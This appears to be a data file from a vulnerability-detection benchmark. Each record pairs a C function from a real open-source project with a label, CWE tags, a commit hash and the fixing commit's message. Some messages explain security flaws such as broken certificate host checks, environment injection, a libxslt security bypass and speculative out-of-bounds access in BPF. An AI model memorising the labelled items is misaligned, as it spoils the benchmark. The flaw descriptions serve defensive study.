int ppp_interface_is_up(struct tunnel *tunnel) { struct ifaddrs *ifap, *ifa; log_debug("Got Address: %s\n", inet_ntoa(tunnel->ipv4.ip_addr)); if (getifaddrs(&ifap)) { log_error("getifaddrs: %s\n", strerror(errno)); return 0; } for (ifa = ifap; ifa != NULL; ifa = ifa->ifa_next) { if (( #if HAVE_USR_SBIN_PPPD (tunnel->config->pppd_ifname && strstr(ifa->ifa_name, tunnel->config->pppd_ifname) != NULL) || strstr(ifa->ifa_name, "ppp") != NULL #endif #if HAVE_USR_SBIN_PPP strstr(ifa->ifa_name, "tun") != NULL #endif ) && ifa->ifa_flags & IFF_UP) { if (&(ifa->ifa_addr->sa_family) != NULL && ifa->ifa_addr->sa_family == AF_INET) { struct in_addr if_ip_addr = cast_addr(ifa->ifa_addr)->sin_addr; log_debug("Interface Name: %s\n", ifa->ifa_name); log_debug("Interface Addr: %s\n", inet_ntoa(if_ip_addr)); if (tunnel->ipv4.ip_addr.s_addr == if_ip_addr.s_addr) { strncpy(tunnel->ppp_iface, ifa->ifa_name, ROUTE_IFACE_LEN - 1); freeifaddrs(ifap); return 1; } } } } freeifaddrs(ifap); return 0; }
0
[ "CWE-295" ]
openfortivpn
60660e00b80bad0fadcf39aee86f6f8756c94f91
289,083,185,566,316,160,000,000,000,000,000,000,000
44
correctly check return value of X509_check_host CVE-2020-7041 incorrect use of X509_check_host (regarding return value) is fixed with this commit. The flaw came in with #242 and prevented proper host name verification when openssl >= 1.0.2 was in use since openfortivpn 1.7.0.
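A minimal sketch of the corrected check implied by the message above, assuming OpenSSL 1.0.2 or later: X509_check_host() reports a match only when it returns exactly 1, while 0 means the name did not match and negative values are internal errors, so both must be treated as failure. The function and variable names below are illustrative and not taken from the openfortivpn sources.

#include <openssl/x509v3.h>

/* Returns 1 only when the certificate matches the expected host name.
 * Any other return value from X509_check_host (0 = mismatch, negative =
 * internal error) is treated as a verification failure. */
static int peer_hostname_ok(X509 *cert, const char *expected_host)
{
    int rc = X509_check_host(cert, expected_host, 0, 0, NULL);
    return rc == 1;
}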
asmlinkage long compat_sys_statfs64(const char __user *path, compat_size_t sz, struct compat_statfs64 __user *buf) { struct nameidata nd; int error; if (sz != sizeof(*buf)) return -EINVAL; error = user_path_walk(path, &nd); if (!error) { struct kstatfs tmp; error = vfs_statfs(nd.dentry, &tmp); if (!error) error = put_compat_statfs64(buf, &tmp); path_release(&nd); } return error; }
0
[]
linux-2.6
822191a2fa1584a29c3224ab328507adcaeac1ab
256,104,685,076,993,450,000,000,000,000,000,000,000
18
[PATCH] skip data conversion in compat_sys_mount when data_page is NULL OpenVZ Linux kernel team has found a problem with mounting in compat mode. Simple command "mount -t smbfs ..." on Fedora Core 5 distro in 32-bit mode leads to oops: Unable to handle kernel NULL pointer dereference at 0000000000000000 RIP: compat_sys_mount+0xd6/0x290 Process mount (pid: 14656, veid=300, threadinfo ffff810034d30000, task ffff810034c86bc0) Call Trace: ia32_sysret+0x0/0xa The problem is that data_page pointer can be NULL, so we should skip data conversion in this case. Signed-off-by: Andrey Mirkin <[email protected]> Cc: <[email protected]> Signed-off-by: Andrew Morton <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
virDomainStorageNetworkParseHost(xmlNodePtr hostnode, virStorageNetHostDefPtr host) { int ret = -1; g_autofree char *transport = NULL; g_autofree char *port = NULL; memset(host, 0, sizeof(*host)); host->transport = VIR_STORAGE_NET_HOST_TRANS_TCP; /* transport can be tcp (default), unix or rdma. */ if ((transport = virXMLPropString(hostnode, "transport"))) { host->transport = virStorageNetHostTransportTypeFromString(transport); if (host->transport < 0) { virReportError(VIR_ERR_CONFIG_UNSUPPORTED, _("unknown protocol transport type '%s'"), transport); goto cleanup; } } host->socket = virXMLPropString(hostnode, "socket"); if (host->transport == VIR_STORAGE_NET_HOST_TRANS_UNIX && host->socket == NULL) { virReportError(VIR_ERR_XML_ERROR, "%s", _("missing socket for unix transport")); goto cleanup; } if (host->transport != VIR_STORAGE_NET_HOST_TRANS_UNIX && host->socket != NULL) { virReportError(VIR_ERR_XML_ERROR, _("transport '%s' does not support " "socket attribute"), transport); goto cleanup; } if (host->transport != VIR_STORAGE_NET_HOST_TRANS_UNIX) { if (!(host->name = virXMLPropString(hostnode, "name"))) { virReportError(VIR_ERR_XML_ERROR, "%s", _("missing name for host")); goto cleanup; } if ((port = virXMLPropString(hostnode, "port"))) { if (virStringParsePort(port, &host->port) < 0) goto cleanup; } } ret = 0; cleanup: if (ret < 0) virStorageNetHostDefClear(host); return ret; }
0
[ "CWE-212" ]
libvirt
a5b064bf4b17a9884d7d361733737fb614ad8979
262,936,950,108,598,830,000,000,000,000,000,000,000
59
conf: Don't format http cookies unless VIR_DOMAIN_DEF_FORMAT_SECURE is used Starting with 3b076391befc3fe72deb0c244ac6c2b4c100b410 (v6.1.0-122-g3b076391be) we support http cookies. Since they may contain somewhat sensitive information we should not format them into the XML unless VIR_DOMAIN_DEF_FORMAT_SECURE is asserted. Reported-by: Han Han <[email protected]> Signed-off-by: Peter Krempa <[email protected]> Reviewed-by: Erik Skultety <[email protected]>
Item_args::Item_args(THD *thd, const Item_args *other) :arg_count(other->arg_count) { if (arg_count <= 2) { args= tmp_arg; } else if (!(args= (Item**) thd->alloc(sizeof(Item*) * arg_count))) { arg_count= 0; return; } if (arg_count) memcpy(args, other->args, sizeof(Item*) * arg_count); }
0
[ "CWE-120" ]
server
eca207c46293bc72dd8d0d5622153fab4d3fccf1
205,056,669,268,167,170,000,000,000,000,000,000,000
15
MDEV-25317 Assertion `scale <= precision' failed in decimal_bin_size And Assertion `scale >= 0 && precision > 0 && scale <= precision' failed in decimal_bin_size_inline/decimal_bin_size. Precision should be kept below DECIMAL_MAX_SCALE for computations. It can be bigger in Item_decimal. I'd fix this too but it changes the existing behaviour so problematic to fix.
add_monitor_path_args (gboolean use_session_helper, FlatpakBwrap *bwrap) { g_autoptr(AutoFlatpakSessionHelper) session_helper = NULL; g_autofree char *monitor_path = NULL; g_autofree char *pkcs11_socket_path = NULL; g_autoptr(GVariant) session_data = NULL; if (use_session_helper) { session_helper = flatpak_session_helper_proxy_new_for_bus_sync (G_BUS_TYPE_SESSION, G_DBUS_PROXY_FLAGS_DO_NOT_LOAD_PROPERTIES | G_DBUS_PROXY_FLAGS_DO_NOT_CONNECT_SIGNALS, "org.freedesktop.Flatpak", "/org/freedesktop/Flatpak/SessionHelper", NULL, NULL); } if (session_helper && flatpak_session_helper_call_request_session_sync (session_helper, &session_data, NULL, NULL)) { if (g_variant_lookup (session_data, "path", "s", &monitor_path)) flatpak_bwrap_add_args (bwrap, "--ro-bind", monitor_path, "/run/host/monitor", "--symlink", "/run/host/monitor/resolv.conf", "/etc/resolv.conf", "--symlink", "/run/host/monitor/host.conf", "/etc/host.conf", "--symlink", "/run/host/monitor/hosts", "/etc/hosts", NULL); if (g_variant_lookup (session_data, "pkcs11-socket", "s", &pkcs11_socket_path)) { g_autofree char *sandbox_pkcs11_socket_path = g_strdup_printf ("/run/user/%d/p11-kit/pkcs11", getuid ()); const char *trusted_module_contents = "# This overrides the runtime p11-kit-trusted module with a client one talking to the trust module on the host\n" "module: p11-kit-client.so\n"; if (flatpak_bwrap_add_args_data (bwrap, "p11-kit-trust.module", trusted_module_contents, -1, "/etc/pkcs11/modules/p11-kit-trust.module", NULL)) { flatpak_bwrap_add_args (bwrap, "--ro-bind", pkcs11_socket_path, sandbox_pkcs11_socket_path, NULL); flatpak_bwrap_unset_env (bwrap, "P11_KIT_SERVER_ADDRESS"); } } } else { if (g_file_test ("/etc/resolv.conf", G_FILE_TEST_EXISTS)) flatpak_bwrap_add_args (bwrap, "--ro-bind", "/etc/resolv.conf", "/etc/resolv.conf", NULL); if (g_file_test ("/etc/host.conf", G_FILE_TEST_EXISTS)) flatpak_bwrap_add_args (bwrap, "--ro-bind", "/etc/host.conf", "/etc/host.conf", NULL); if (g_file_test ("/etc/hosts", G_FILE_TEST_EXISTS)) flatpak_bwrap_add_args (bwrap, "--ro-bind", "/etc/hosts", "/etc/hosts", NULL); } }
0
[ "CWE-94", "CWE-74" ]
flatpak
6d1773d2a54dde9b099043f07a2094a4f1c2f486
15,201,673,145,906,157,000,000,000,000,000,000,000
65
run: Convert all environment variables into bwrap arguments This avoids some of them being filtered out by a setuid bwrap. It also means that if they came from an untrusted source, they cannot be used to inject arbitrary code into a non-setuid bwrap via mechanisms like LD_PRELOAD. Because they get bundled into a memfd or temporary file, they do not actually appear in argv, ensuring that they remain inaccessible to processes running under a different uid (which is important if their values are tokens or other secrets). Signed-off-by: Simon McVittie <[email protected]> Part-of: https://github.com/flatpak/flatpak/security/advisories/GHSA-4ppf-fxf6-vxg2
static struct bpf_reg_state *reg_state(struct bpf_verifier_env *env, int regno) { return cur_regs(env) + regno; }
0
[ "CWE-703", "CWE-189" ]
linux
979d63d50c0c0f7bc537bf821e056cc9fe5abd38
9,567,876,609,951,029,000,000,000,000,000,000,000
4
bpf: prevent out of bounds speculation on pointer arithmetic Jann reported that the original commit back in b2157399cc98 ("bpf: prevent out-of-bounds speculation") was not sufficient to stop CPU from speculating out of bounds memory access: While b2157399cc98 only focussed on masking array map access for unprivileged users for tail calls and data access such that the user provided index gets sanitized from BPF program and syscall side, there is still a more generic form affected from BPF programs that applies to most maps that hold user data in relation to dynamic map access when dealing with unknown scalars or "slow" known scalars as access offset, for example: - Load a map value pointer into R6 - Load an index into R7 - Do a slow computation (e.g. with a memory dependency) that loads a limit into R8 (e.g. load the limit from a map for high latency, then mask it to make the verifier happy) - Exit if R7 >= R8 (mispredicted branch) - Load R0 = R6[R7] - Load R0 = R6[R0] For unknown scalars there are two options in the BPF verifier where we could derive knowledge from in order to guarantee safe access to the memory: i) While </>/<=/>= variants won't allow to derive any lower or upper bounds from the unknown scalar where it would be safe to add it to the map value pointer, it is possible through ==/!= test however. ii) another option is to transform the unknown scalar into a known scalar, for example, through ALU ops combination such as R &= <imm> followed by R |= <imm> or any similar combination where the original information from the unknown scalar would be destroyed entirely leaving R with a constant. The initial slow load still precedes the latter ALU ops on that register, so the CPU executes speculatively from that point. Once we have the known scalar, any compare operation would work then. A third option only involving registers with known scalars could be crafted as described in [0] where a CPU port (e.g. Slow Int unit) would be filled with many dependent computations such that the subsequent condition depending on its outcome has to wait for evaluation on its execution port and thereby executing speculatively if the speculated code can be scheduled on a different execution port, or any other form of mistraining as described in [1], for example. Given this is not limited to only unknown scalars, not only map but also stack access is affected since both is accessible for unprivileged users and could potentially be used for out of bounds access under speculation. In order to prevent any of these cases, the verifier is now sanitizing pointer arithmetic on the offset such that any out of bounds speculation would be masked in a way where the pointer arithmetic result in the destination register will stay unchanged, meaning offset masked into zero similar as in array_index_nospec() case. With regards to implementation, there are three options that were considered: i) new insn for sanitation, ii) push/pop insn and sanitation as inlined BPF, iii) reuse of ax register and sanitation as inlined BPF. Option i) has the downside that we end up using from reserved bits in the opcode space, but also that we would require each JIT to emit masking as native arch opcodes meaning mitigation would have slow adoption till everyone implements it eventually which is counter-productive. Option ii) and iii) have both in common that a temporary register is needed in order to implement the sanitation as inlined BPF since we are not allowed to modify the source register. 
While a push / pop insn in ii) would be useful to have in any case, it requires once again that every JIT needs to implement it first. While possible, amount of changes needed would also be unsuitable for a -stable patch. Therefore, the path which has fewer changes, less BPF instructions for the mitigation and does not require anything to be changed in the JITs is option iii) which this work is pursuing. The ax register is already mapped to a register in all JITs (modulo arm32 where it's mapped to stack as various other BPF registers there) and used in constant blinding for JITs-only so far. It can be reused for verifier rewrites under certain constraints. The interpreter's tmp "register" has therefore been remapped into extending the register set with hidden ax register and reusing that for a number of instructions that needed the prior temporary variable internally (e.g. div, mod). This allows for zero increase in stack space usage in the interpreter, and enables (restricted) generic use in rewrites otherwise as long as such a patchlet does not make use of these instructions. The sanitation mask is dynamic and relative to the offset the map value or stack pointer currently holds. There are various cases that need to be taken under consideration for the masking, e.g. such operation could look as follows: ptr += val or val += ptr or ptr -= val. Thus, the value to be sanitized could reside either in source or in destination register, and the limit is different depending on whether the ALU op is addition or subtraction and depending on the current known and bounded offset. The limit is derived as follows: limit := max_value_size - (smin_value + off). For subtraction: limit := umax_value + off. This holds because we do not allow any pointer arithmetic that would temporarily go out of bounds or would have an unknown value with mixed signed bounds where it is unclear at verification time whether the actual runtime value would be either negative or positive. For example, we have a derived map pointer value with constant offset and bounded one, so limit based on smin_value works because the verifier requires that statically analyzed arithmetic on the pointer must be in bounds, and thus it checks if resulting smin_value + off and umax_value + off is still within map value bounds at time of arithmetic in addition to time of access. Similarly, for the case of stack access we derive the limit as follows: MAX_BPF_STACK + off for subtraction and -off for the case of addition where off := ptr_reg->off + ptr_reg->var_off.value. Subtraction is a special case for the masking which can be in form of ptr += -val, ptr -= -val, or ptr -= val. In the first two cases where we know that the value is negative, we need to temporarily negate the value in order to do the sanitation on a positive value where we later swap the ALU op, and restore original source register if the value was in source. The sanitation of pointer arithmetic alone is still not fully sufficient as is, since a scenario like the following could happen ... PTR += 0x1000 (e.g. K-based imm) PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON PTR += 0x1000 PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON [...] ... which under speculation could end up as ... PTR += 0x1000 PTR -= 0 [ truncated by mitigation ] PTR += 0x1000 PTR -= 0 [ truncated by mitigation ] [...] ... and therefore still access out of bounds. To prevent such case, the verifier is also analyzing safety for potential out of bounds access under speculative execution. 
Meaning, it is also simulating pointer access under truncation. We therefore "branch off" and push the current verification state after the ALU operation with known 0 to the verification stack for later analysis. Given the current path analysis succeeded it is likely that the one under speculation can be pruned. In any case, it is also subject to existing complexity limits and therefore anything beyond this point will be rejected. In terms of pruning, it needs to be ensured that the verification state from speculative execution simulation must never prune a non-speculative execution path, therefore, we mark verifier state accordingly at the time of push_stack(). If verifier detects out of bounds access under speculative execution from one of the possible paths that includes a truncation, it will reject such program. Given we mask every reg-based pointer arithmetic for unprivileged programs, we've been looking into how it could affect real-world programs in terms of size increase. As the majority of programs are targeted for privileged-only use case, we've unconditionally enabled masking (with its alu restrictions on top of it) for privileged programs for the sake of testing in order to check i) whether they get rejected in its current form, and ii) by how much the number of instructions and size will increase. We've tested this by using Katran, Cilium and test_l4lb from the kernel selftests. For Katran we've evaluated balancer_kern.o, Cilium bpf_lxc.o and an older test object bpf_lxc_opt_-DUNKNOWN.o and l4lb we've used test_l4lb.o as well as test_l4lb_noinline.o. We found that none of the programs got rejected by the verifier with this change, and that impact is rather minimal to none. balancer_kern.o had 13,904 bytes (1,738 insns) xlated and 7,797 bytes JITed before and after the change. Most complex program in bpf_lxc.o had 30,544 bytes (3,817 insns) xlated and 18,538 bytes JITed before and after and none of the other tail call programs in bpf_lxc.o had any changes either. For the older bpf_lxc_opt_-DUNKNOWN.o object we found a small increase from 20,616 bytes (2,576 insns) and 12,536 bytes JITed before to 20,664 bytes (2,582 insns) and 12,558 bytes JITed after the change. Other programs from that object file had similar small increase. Both test_l4lb.o had no change and remained at 6,544 bytes (817 insns) xlated and 3,401 bytes JITed and for test_l4lb_noinline.o constant at 5,080 bytes (634 insns) xlated and 3,313 bytes JITed. This can be explained in that LLVM typically optimizes stack based pointer arithmetic by using K-based operations and that use of dynamic map access is not overly frequent. However, in future we may decide to optimize the algorithm further under known guarantees from branch and value speculation. Latter seems also unclear in terms of prediction heuristics that today's CPUs apply as well as whether there could be collisions in e.g. the predictor's Value History/Pattern Table for triggering out of bounds access, thus masking is performed unconditionally at this point but could be subject to relaxation later on. We were generally also brainstorming various other approaches for mitigation, but the blocker was always lack of available registers at runtime and/or overhead for runtime tracking of limits belonging to a specific pointer. Thus, we found this to be minimally intrusive under given constraints. With that in place, a simple example with sanitized access on unprivileged load at post-verification time looks as follows: # bpftool prog dump xlated id 282 [...] 
28: (79) r1 = *(u64 *)(r7 +0) 29: (79) r2 = *(u64 *)(r7 +8) 30: (57) r1 &= 15 31: (79) r3 = *(u64 *)(r0 +4608) 32: (57) r3 &= 1 33: (47) r3 |= 1 34: (2d) if r2 > r3 goto pc+19 35: (b4) (u32) r11 = (u32) 20479 | 36: (1f) r11 -= r2 | Dynamic sanitation for pointer 37: (4f) r11 |= r2 | arithmetic with registers 38: (87) r11 = -r11 | containing bounded or known 39: (c7) r11 s>>= 63 | scalars in order to prevent 40: (5f) r11 &= r2 | out of bounds speculation. 41: (0f) r4 += r11 | 42: (71) r4 = *(u8 *)(r4 +0) 43: (6f) r4 <<= r1 [...] For the case where the scalar sits in the destination register as opposed to the source register, the following code is emitted for the above example: [...] 16: (b4) (u32) r11 = (u32) 20479 17: (1f) r11 -= r2 18: (4f) r11 |= r2 19: (87) r11 = -r11 20: (c7) r11 s>>= 63 21: (5f) r2 &= r11 22: (0f) r2 += r0 23: (61) r0 = *(u32 *)(r2 +0) [...] JIT blinding example with non-conflicting use of r10: [...] d5: je 0x0000000000000106 _ d7: mov 0x0(%rax),%edi | da: mov $0xf153246,%r10d | Index load from map value and e0: xor $0xf153259,%r10 | (const blinded) mask with 0x1f. e7: and %r10,%rdi |_ ea: mov $0x2f,%r10d | f0: sub %rdi,%r10 | Sanitized addition. Both use r10 f3: or %rdi,%r10 | but do not interfere with each f6: neg %r10 | other. (Neither do these instructions f9: sar $0x3f,%r10 | interfere with the use of ax as temp fd: and %r10,%rdi | in interpreter.) 100: add %rax,%rdi |_ 103: mov 0x0(%rdi),%eax [...] Tested that it fixes Jann's reproducer, and also checked that test_verifier and test_progs suite with interpreter, JIT and JIT with hardening enabled on x86-64 and arm64 runs successfully. [0] Speculose: Analyzing the Security Implications of Speculative Execution in CPUs, Giorgi Maisuradze and Christian Rossow, https://arxiv.org/pdf/1801.04084.pdf [1] A Systematic Evaluation of Transient Execution Attacks and Defenses, Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, https://arxiv.org/pdf/1811.05441.pdf Fixes: b2157399cc98 ("bpf: prevent out-of-bounds speculation") Reported-by: Jann Horn <[email protected]> Signed-off-by: Daniel Borkmann <[email protected]> Acked-by: Alexei Starovoitov <[email protected]> Signed-off-by: Alexei Starovoitov <[email protected]>
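A plain-C model of the masking sequence quoted in the message above (r11 = limit; r11 -= val; r11 |= val; r11 = -r11; r11 s>>= 63; r11 &= val). This is only an illustration of the arithmetic for a non-negative offset val, not the kernel's verifier code; the negative-value case is handled by negating first, as the message explains, and an arithmetic right shift on signed values is assumed, as on the compilers the kernel supports.

#include <stdint.h>

/* Returns val unchanged when 0 <= val <= limit, and 0 otherwise, without
 * any branch, mirroring the r11-based instruction sequence above. */
static uint64_t sanitize_offset(uint64_t val, uint64_t limit)
{
    uint64_t m = limit - val; /* sign bit becomes set when val > limit */
    m |= val;                 /* ...or when val itself has its sign bit set */
    m = -m;                   /* in range: zero or sign bit set; out of range: positive */
    m = (uint64_t)((int64_t)m >> 63); /* all-ones mask if in range, else 0 */
    return val & m;
}

A quick sanity check of the model: sanitize_offset(3, 5) == 3, sanitize_offset(7, 5) == 0, and a value with its top bit set is truncated to 0.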
template<typename t> const CImg<T>& _save_tiff(TIFF *tif, const unsigned int directory, const unsigned int z, const t& pixel_t, const unsigned int compression_type, const float *const voxel_size, const char *const description) const { if (is_empty() || !tif || pixel_t) return *this; const char *const filename = TIFFFileName(tif); uint32 rowsperstrip = (uint32)-1; uint16 spp = _spectrum, bpp = sizeof(t)*8, photometric; if (spp==3 || spp==4) photometric = PHOTOMETRIC_RGB; else photometric = PHOTOMETRIC_MINISBLACK; TIFFSetDirectory(tif,directory); TIFFSetField(tif,TIFFTAG_IMAGEWIDTH,_width); TIFFSetField(tif,TIFFTAG_IMAGELENGTH,_height); if (voxel_size) { const float vx = voxel_size[0], vy = voxel_size[1], vz = voxel_size[2]; TIFFSetField(tif,TIFFTAG_RESOLUTIONUNIT,RESUNIT_NONE); TIFFSetField(tif,TIFFTAG_XRESOLUTION,1.0f/vx); TIFFSetField(tif,TIFFTAG_YRESOLUTION,1.0f/vy); CImg<charT> s_description(256); cimg_snprintf(s_description,s_description._width,"VX=%g VY=%g VZ=%g spacing=%g",vx,vy,vz,vz); TIFFSetField(tif,TIFFTAG_IMAGEDESCRIPTION,s_description.data()); } if (description) TIFFSetField(tif,TIFFTAG_IMAGEDESCRIPTION,description); TIFFSetField(tif,TIFFTAG_ORIENTATION,ORIENTATION_TOPLEFT); TIFFSetField(tif,TIFFTAG_SAMPLESPERPIXEL,spp); if (cimg::type<t>::is_float()) TIFFSetField(tif,TIFFTAG_SAMPLEFORMAT,3); else if (cimg::type<t>::min()==0) TIFFSetField(tif,TIFFTAG_SAMPLEFORMAT,1); else TIFFSetField(tif,TIFFTAG_SAMPLEFORMAT,2); double valm, valM = max_min(valm); TIFFSetField(tif,TIFFTAG_SMINSAMPLEVALUE,valm); TIFFSetField(tif,TIFFTAG_SMAXSAMPLEVALUE,valM); TIFFSetField(tif,TIFFTAG_BITSPERSAMPLE,bpp); TIFFSetField(tif,TIFFTAG_PLANARCONFIG,PLANARCONFIG_CONTIG); TIFFSetField(tif,TIFFTAG_PHOTOMETRIC,photometric); TIFFSetField(tif,TIFFTAG_COMPRESSION,compression_type==2?COMPRESSION_JPEG: compression_type==1?COMPRESSION_LZW:COMPRESSION_NONE); rowsperstrip = TIFFDefaultStripSize(tif,rowsperstrip); TIFFSetField(tif,TIFFTAG_ROWSPERSTRIP,rowsperstrip); TIFFSetField(tif,TIFFTAG_FILLORDER,FILLORDER_MSB2LSB); TIFFSetField(tif,TIFFTAG_SOFTWARE,"CImg"); t *const buf = (t*)_TIFFmalloc(TIFFStripSize(tif)); if (buf) { for (unsigned int row = 0; row<_height; row+=rowsperstrip) { uint32 nrow = (row + rowsperstrip>_height?_height - row:rowsperstrip); tstrip_t strip = TIFFComputeStrip(tif,row,0); tsize_t i = 0; for (unsigned int rr = 0; rr<nrow; ++rr) for (unsigned int cc = 0; cc<_width; ++cc) for (unsigned int vv = 0; vv<spp; ++vv) buf[i++] = (t)(*this)(cc,row + rr,z,vv); if (TIFFWriteEncodedStrip(tif,strip,buf,i*sizeof(t))<0) throw CImgIOException(_cimg_instance "save_tiff(): Invalid strip writing when saving file '%s'.", cimg_instance, filename?filename:"(FILE*)"); } _TIFFfree(buf); } TIFFWriteDirectory(tif); return *this;
0
[ "CWE-125" ]
CImg
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
120,279,614,116,920,270,000,000,000,000,000,000,000
61
Fix other issues in 'CImg<T>::load_bmp()'.
xsltLoadStylesheetPI(xmlDocPtr doc) { xmlNodePtr child; xsltStylesheetPtr ret = NULL; xmlChar *href = NULL; xmlURIPtr URI; xsltInitGlobals(); if (doc == NULL) return(NULL); /* * Find the text/xml stylesheet PI id any before the root */ child = doc->children; while ((child != NULL) && (child->type != XML_ELEMENT_NODE)) { if ((child->type == XML_PI_NODE) && (xmlStrEqual(child->name, BAD_CAST "xml-stylesheet"))) { href = xsltParseStylesheetPI(child->content); if (href != NULL) break; } child = child->next; } /* * If found check the href to select processing */ if (href != NULL) { #ifdef WITH_XSLT_DEBUG_PARSING xsltGenericDebug(xsltGenericDebugContext, "xsltLoadStylesheetPI : found PI href=%s\n", href); #endif URI = xmlParseURI((const char *) href); if (URI == NULL) { xsltTransformError(NULL, NULL, child, "xml-stylesheet : href %s is not valid\n", href); xmlFree(href); return(NULL); } if ((URI->fragment != NULL) && (URI->scheme == NULL) && (URI->opaque == NULL) && (URI->authority == NULL) && (URI->server == NULL) && (URI->user == NULL) && (URI->path == NULL) && (URI->query == NULL)) { xmlAttrPtr ID; #ifdef WITH_XSLT_DEBUG_PARSING xsltGenericDebug(xsltGenericDebugContext, "xsltLoadStylesheetPI : Reference to ID %s\n", href); #endif if (URI->fragment[0] == '#') ID = xmlGetID(doc, (const xmlChar *) &(URI->fragment[1])); else ID = xmlGetID(doc, (const xmlChar *) URI->fragment); if (ID == NULL) { xsltTransformError(NULL, NULL, child, "xml-stylesheet : no ID %s found\n", URI->fragment); } else { xmlDocPtr fake; xmlNodePtr subtree, newtree; xmlNsPtr ns; #ifdef WITH_XSLT_DEBUG xsltGenericDebug(xsltGenericDebugContext, "creating new document from %s for embedded stylesheet\n", doc->URL); #endif /* * move the subtree in a new document passed to * the stylesheet analyzer */ subtree = ID->parent; fake = xmlNewDoc(NULL); if (fake != NULL) { /* * Should the dictionary still be shared even though * the nodes are being copied rather than moved? */ fake->dict = doc->dict; xmlDictReference(doc->dict); #ifdef WITH_XSLT_DEBUG xsltGenericDebug(xsltGenericDebugContext, "reusing dictionary from %s for embedded stylesheet\n", doc->URL); #endif newtree = xmlDocCopyNode(subtree, fake, 1); fake->URL = xmlNodeGetBase(doc, subtree->parent); #ifdef WITH_XSLT_DEBUG xsltGenericDebug(xsltGenericDebugContext, "set base URI for embedded stylesheet as %s\n", fake->URL); #endif /* * Add all namespaces in scope of embedded stylesheet to * root element of newly created stylesheet document */ while ((subtree = subtree->parent) != (xmlNodePtr)doc) { for (ns = subtree->ns; ns; ns = ns->next) { xmlNewNs(newtree, ns->href, ns->prefix); } } xmlAddChild((xmlNodePtr)fake, newtree); ret = xsltParseStylesheetDoc(fake); if (ret == NULL) xmlFreeDoc(fake); } } } else { xmlChar *URL, *base; /* * Reference to an external stylesheet */ base = xmlNodeGetBase(doc, (xmlNodePtr) doc); URL = xmlBuildURI(href, base); if (URL != NULL) { #ifdef WITH_XSLT_DEBUG_PARSING xsltGenericDebug(xsltGenericDebugContext, "xsltLoadStylesheetPI : fetching %s\n", URL); #endif ret = xsltParseStylesheetFile(URL); xmlFree(URL); } else { #ifdef WITH_XSLT_DEBUG_PARSING xsltGenericDebug(xsltGenericDebugContext, "xsltLoadStylesheetPI : fetching %s\n", href); #endif ret = xsltParseStylesheetFile(href); } if (base != NULL) xmlFree(base); } xmlFreeURI(URI); xmlFree(href); } return(ret); }
0
[]
libxslt
e03553605b45c88f0b4b2980adfbbb8f6fca2fd6
30,785,497,082,675,580,000,000,000,000,000,000,000
142
Fix security framework bypass xsltCheckRead and xsltCheckWrite return -1 in case of error but callers don't check for this condition and allow access. With a specially crafted URL, xsltCheckRead could be tricked into returning an error because of a supposedly invalid URL that would still be loaded succesfully later on. Fixes #12. Thanks to Felix Wilhelm for the report.
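The message above comes down to a return-value contract: a caller may grant access only on a strictly positive result, since 0 means denied and -1 means the check itself failed. A sketch of that caller-side discipline, assuming the usual xsltCheckRead() signature from libxslt's security.h; the wrapper name is illustrative.

#include <libxml/xmlstring.h>
#include <libxslt/security.h>

/* Only a strictly positive answer from xsltCheckRead grants access:
 * 0 is an explicit denial and -1 an internal error, and both must be
 * refused, which is the caller behaviour the fix enforces. */
static int document_may_be_read(xsltSecurityPrefsPtr sec,
                                xsltTransformContextPtr ctxt,
                                const xmlChar *URL)
{
    return xsltCheckRead(sec, ctxt, URL) > 0;
}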
static inline void cma_set_ip_ver(struct cma_hdr *hdr, u8 ip_ver) { hdr->ip_version = (ip_ver << 4) | (hdr->ip_version & 0xF); }
0
[ "CWE-416" ]
linux
bc0bdc5afaa740d782fbf936aaeebd65e5c2921d
13,050,008,327,612,447,000,000,000,000,000,000,000
4
RDMA/cma: Do not change route.addr.src_addr.ss_family If the state is not idle then rdma_bind_addr() will immediately fail and no change to global state should happen. For instance if the state is already RDMA_CM_LISTEN then this will corrupt the src_addr and would cause the test in cma_cancel_operation(): if (cma_any_addr(cma_src_addr(id_priv)) && !id_priv->cma_dev) To view a mangled src_addr, eg with a IPv6 loopback address but an IPv4 family, failing the test. This would manifest as this trace from syzkaller: BUG: KASAN: use-after-free in __list_add_valid+0x93/0xa0 lib/list_debug.c:26 Read of size 8 at addr ffff8881546491e0 by task syz-executor.1/32204 CPU: 1 PID: 32204 Comm: syz-executor.1 Not tainted 5.12.0-rc8-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 Call Trace: __dump_stack lib/dump_stack.c:79 [inline] dump_stack+0x141/0x1d7 lib/dump_stack.c:120 print_address_description.constprop.0.cold+0x5b/0x2f8 mm/kasan/report.c:232 __kasan_report mm/kasan/report.c:399 [inline] kasan_report.cold+0x7c/0xd8 mm/kasan/report.c:416 __list_add_valid+0x93/0xa0 lib/list_debug.c:26 __list_add include/linux/list.h:67 [inline] list_add_tail include/linux/list.h:100 [inline] cma_listen_on_all drivers/infiniband/core/cma.c:2557 [inline] rdma_listen+0x787/0xe00 drivers/infiniband/core/cma.c:3751 ucma_listen+0x16a/0x210 drivers/infiniband/core/ucma.c:1102 ucma_write+0x259/0x350 drivers/infiniband/core/ucma.c:1732 vfs_write+0x28e/0xa30 fs/read_write.c:603 ksys_write+0x1ee/0x250 fs/read_write.c:658 do_syscall_64+0x2d/0x70 arch/x86/entry/common.c:46 entry_SYSCALL_64_after_hwframe+0x44/0xae Which is indicating that an rdma_id_private was destroyed without doing cma_cancel_listens(). Instead of trying to re-use the src_addr memory to indirectly create an any address build one explicitly on the stack and bind to that as any other normal flow would do. Link: https://lore.kernel.org/r/[email protected] Cc: [email protected] Fixes: 732d41c545bb ("RDMA/cma: Make the locking for automatic state transition more clear") Reported-by: [email protected] Tested-by: Hao Sun <[email protected]> Reviewed-by: Leon Romanovsky <[email protected]> Signed-off-by: Jason Gunthorpe <[email protected]>
